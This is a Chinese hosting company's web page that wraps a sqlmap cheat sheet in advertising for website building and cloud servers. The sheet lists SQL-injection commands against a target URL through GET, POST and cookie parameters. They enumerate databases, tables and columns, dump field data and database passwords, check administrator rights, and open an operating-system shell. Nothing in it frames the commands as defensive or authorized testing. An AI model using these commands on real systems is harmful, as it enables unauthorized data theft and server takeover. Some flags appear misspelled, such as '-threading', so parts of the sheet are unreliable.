sqlmap命令-创新互联
SQLMAP
成都创新互联公司长期为上千客户提供的网站建设服务,团队从业经验10年,关注不同地域、不同群体,并针对不同对象提供差异化的产品和服务;打造开放共赢平台,与合作伙伴共同营造健康的互联网生态环境。为松阳企业提供专业的成都网站设计、网站制作,松阳网站改版等技术服务。拥有十多年丰富建站经验和众多成功案例,为您定制开发。GET 方式的注入 sqlmap.py -u "URL"
POST 方式的注入 sqlmap.py -u "URL" --data "POST参数=POST数值"
COOKIE 方式的注入 sqlmap.py -u "URL" --cookie "cookies 值"
爆数据库名(cookie根据实际的情况) sqlmap.py -u "URL" [--cookie "cookies 值"] --dbs
爆目标数据库中的表 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --tables
爆目标数据表字段 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 --columns
导出目标字段的数据 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 -C 要导出数据的字段名,多个字段用逗号分隔 --dump
爆出目标库有多少数据 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --count
检测当前用户 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-user
检测当前用户是否管理员 sqlmap.py -u "URL" [--cookie "cookies 值"] --is-dba
检测数据库用户 sqlmap.py -u "URL" [--cookie "cookies 值"] --user -v 0
检测数据库用户密码 sqlmap.py -u "URL" [--cookie "cookies 值"] --password -v 0
检测当前数据库 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-db
多线程 -threading 5
如果是管理员,我们可以写Shell
操作系统Shell写入
sqlmap.py -u "URL" [--cookie "cookies 值"] --os-shell
另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。
文章题目:sqlmap命令-创新互联
网页路径:http://cdiso.cn/article/dcdepi.html